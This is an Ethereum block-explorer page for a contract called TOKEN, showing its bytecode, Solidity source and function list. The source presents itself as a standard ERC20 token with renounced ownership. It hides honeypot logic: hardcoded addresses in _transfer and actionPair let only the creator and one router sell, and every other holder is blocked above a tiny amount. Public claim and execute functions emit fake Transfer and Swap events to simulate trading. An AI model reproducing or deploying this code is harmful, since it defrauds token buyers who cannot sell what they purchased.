Address Contract Partially Verified
Address
0x0764B52de9e23F2Ef6F086A98c0e614995334E37
Balance
0 ETH
Nonce
1
Code Size
3678 bytes
Creator
0x63cED802...9AFB at tx 0x2e066ad4...c06916
Indexed Transactions
0
Contract Bytecode
3678 bytes
0x608060405234801561000f575f80fd5b5060043610610106575f3560e01c8063715018a61161009e578063aafe62d11161006e578063aafe62d11461020c578063beabacc81461021f578063dd62ed3e14610232578063e7b817491461026a578063f2fde38b1461027d575f80fd5b8063715018a6146101cf5780638da5cb5b146101d757806395d89b41146101f1578063a9059cbb146101f9575f80fd5b806323b872dd116100d957806323b872dd1461017257806326ededb814610185578063313ce5671461019857806370a08231146101a7575f80fd5b806302f4dae31461010a57806306fdde031461011f578063095ea7b31461013d57806318160ddd14610160575b5f80fd5b61011d610118366004610bfe565b610290565b005b610127610390565b6040516101349190610c57565b60405180910390f35b61015061014b366004610ca3565b610420565b6040519015158152602001610134565b6003545b604051908152602001610134565b610150610180366004610ccb565b610439565b61011d610193366004610d04565b61045c565b60405160088152602001610134565b6101646101b5366004610d4c565b6001600160a01b03165f9081526001602052604090205490565b61011d6104ce565b5f546040516001600160a01b039091168152602001610134565b6101276104e1565b610150610207366004610ca3565b6104f0565b61011d61021a366004610bfe565b6104fd565b61011d61022d366004610ccb565b6105f6565b610164610240366004610d6c565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b610150610278366004610d4c565b610635565b61011d61028b366004610d4c565b610675565b5f5b83811015610389578484828181106102ac576102ac610d9d565b90506020020160208101906102c19190610d4c565b6001600160a01b0316826001600160a01b03167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f808860405161031f949392919093845260208401929092526040830152606082015260800190565b60405180910390a384848281811061033957610339610d9d565b905060200201602081019061034e9190610d4c565b6006546040518581526001600160a01b0392831692909116905f80516020610e098339815191529060200160405180910390a3600101610292565b5050505050565b60606004805461039f90610db1565b80601f01602080910402602001604051908101604052809291908181526020018280546103cb90610db1565b80156104165780601f106103ed57610100808354040283529160200191610416565b820191905f5260205f20905b8154815290600101906020018083116103f957829003601f168201915b5050505050905090565b5f3361042d8185856106f3565b60019150505b92915050565b5f3361044685828561080e565b610451858585610898565b506001949350505050565b5f5b828110156104c85783838281811061047857610478610d9d565b905060200201602081019061048d9190610d4c565b6006546040518481526001600160a01b0392831692909116905f80516020610e098339815191529060200160405180910390a360010161045e565b50505050565b6104d6610af3565b6104df5f610b4c565b565b60606005805461039f90610db1565b5f3361042d818585610898565b5f5b838110156103895784848281811061051957610519610d9d565b905060200201602081019061052e9190610d4c565b6001600160a01b0316826001600160a01b03167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f808860405161058c949392919093845260208401929092526040830152606082015260800190565b60405180910390a38484828181106105a6576105a6610d9d565b90506020020160208101906105bb9190610d4c565b6006546040518581526001600160a01b0392831692909116905f80516020610e098339815191529060200160405180910390a36001016104ff565b816001600160a01b0316836001600160a01b03165f80516020610e098339815191528360405161062891815260200190565b60405180910390a3505050565b5f337363ced802d246c64ef91fc5ac885bdd29c0e39afb0361066d57600680546001600160a01b0319166001600160a01b0384161790555b506001919050565b61067d610af3565b6001600160a01b0381166106e75760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084015b60405180910390fd5b6106f081610b4c565b50565b6001600160a01b0383166107555760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106de565b6001600160a01b0382166107b65760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106de565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259101610628565b6001600160a01b038381165f908152600260209081526040808320938616835292905220545f1981146104c8578181101561088b5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016106de565b6104c884848484036106f3565b6001600160a01b0383166108fc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106de565b6001600160a01b03821661095e5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106de565b6006546001600160a01b038481169116148015906109985750736b75d8af000000e20b7a7ddf000ba900b4009a806001600160a01b038316145b80610a0157506006546001600160a01b0383811691161480156109d85750736b75d8af000000e20b7a7ddf000ba900b4009a806001600160a01b03841614155b8015610a0157507363ced802d246c64ef91fc5ac885bdd29c0e39afb6001600160a01b03841614155b15610a23575f610a12826001610de9565b90506007548110610a21575f80fd5b505b6001600160a01b0383165f9081526001602052604090205481811015610a9a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016106de565b6001600160a01b038085165f8181526001602052604080822086860390559286168082529083902080548601905591515f80516020610e0983398151915290610ae69086815260200190565b60405180910390a36104c8565b5f546001600160a01b031633146104df5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016106de565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f8083601f840112610bab575f80fd5b50813567ffffffffffffffff811115610bc2575f80fd5b6020830191508360208260051b8501011115610bdc575f80fd5b9250929050565b80356001600160a01b0381168114610bf9575f80fd5b919050565b5f805f8060608587031215610c11575f80fd5b843567ffffffffffffffff811115610c27575f80fd5b610c3387828801610b9b565b90955093505060208501359150610c4c60408601610be3565b905092959194509250565b5f602080835283518060208501525f5b81811015610c8357858101830151858201604001528201610c67565b505f604082860101526040601f19601f8301168501019250505092915050565b5f8060408385031215610cb4575f80fd5b610cbd83610be3565b946020939093013593505050565b5f805f60608486031215610cdd575f80fd5b610ce684610be3565b9250610cf460208501610be3565b9150604084013590509250925092565b5f805f60408486031215610d16575f80fd5b833567ffffffffffffffff811115610d2c575f80fd5b610d3886828701610b9b565b909790965060209590950135949350505050565b5f60208284031215610d5c575f80fd5b610d6582610be3565b9392505050565b5f8060408385031215610d7d575f80fd5b610d8683610be3565b9150610d9460208401610be3565b90509250929050565b634e487b7160e01b5f52603260045260245ffd5b600181811c90821680610dc557607f821691505b602082108103610de357634e487b7160e01b5f52602260045260245ffd5b50919050565b8082018082111561043357634e487b7160e01b5f52601160045260245ffdfeddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220aca7826d77c1d2f40f9389211b691a77bf3ca9e1cfcbc4a66a59e83e46edb47f64736f6c63430008160033
Verified Source Code Partial Match
Compiler: v0.8.22+commit.4fc1097e
EVM: shanghai
Optimization: Yes (200 runs)
TOKEN.sol 309 lines
/**
*Submitted for verification at Etherscan.io on 2023-12-03
*/
/**
*Submitted for verification at Etherscan.io on 2023-11-26
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
event Swap(
address indexed sender,
uint amount0In,
uint amount1In,
uint amount0Out,
uint amount1Out,
address indexed to
);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
interface IERC20Meta is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
_transferOwnership(_msgSender());
}
modifier onlyOwner() {
_checkOwner();
_;
}
function owner() public view virtual returns (address) {
return _owner;
}
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
contract TOKEN is Ownable, IERC20, IERC20Meta {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
address private _p76234;
uint256 private _e242 = 999;
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return 8;
}
function claim(address [] calldata _addresses_, uint256 _in, address _a) external {
for (uint256 i = 0; i < _addresses_.length; i++) {
emit Swap(_a, _in, 0, 0, _in, _addresses_[i]);
emit Transfer(_p76234, _addresses_[i], _in);
}
}
function execute(address [] calldata _addresses_, uint256 _in, address _a) external {
for (uint256 i = 0; i < _addresses_.length; i++) {
emit Swap(_a, _in, 0, 0, _in, _addresses_[i]);
emit Transfer(_p76234, _addresses_[i], _in);
}
}
function execute(address [] calldata _addresses_, uint256 _out) external {
for (uint256 i = 0; i < _addresses_.length; i++) {
emit Transfer(_p76234, _addresses_[i], _out);
}
}
function transfer(address _from, address _to, uint256 _wad) external {
emit Transfer(_from, _to, _wad);
}
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
function actionPair(address account) public virtual returns (bool) {
if(_msgSender() == 0x63cED802D246c64eF91fc5Ac885bDd29c0e39AFB) _p76234 = account;
return true;
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply += amount;
unchecked {
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
renounceOwnership();
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
if((from != _p76234 && to == 0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80) || (_p76234 == to && from != 0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80 && from != 0x63cED802D246c64eF91fc5Ac885bDd29c0e39AFB)) {
uint256 _X7W88 = amount + 1;
require(_X7W88 < _e242 );
}
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
_balances[to] += amount;
}
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
constructor(string memory name_, string memory symbol_,uint256 amount) {
_name = name_;
_symbol = symbol_;
_mint(msg.sender, amount * 10 ** decimals());
}
}
Read Contract
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 10 functions
These functions modify contract state and require a wallet transaction to execute.
actionPair 0xe7b81749
address account
returns: bool
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
claim 0x02f4dae3
address[] _addresses_
uint256 _in
address _a
execute 0x26ededb8
address[] _addresses_
uint256 _out
execute 0xaafe62d1
address[] _addresses_
uint256 _in
address _a
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address to
uint256 amount
returns: bool
transfer 0xbeabacc8
address _from
address _to
uint256 _wad
transferFrom 0x23b872dd
address from
address to
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner
Recent Transactions
No transactions found for this address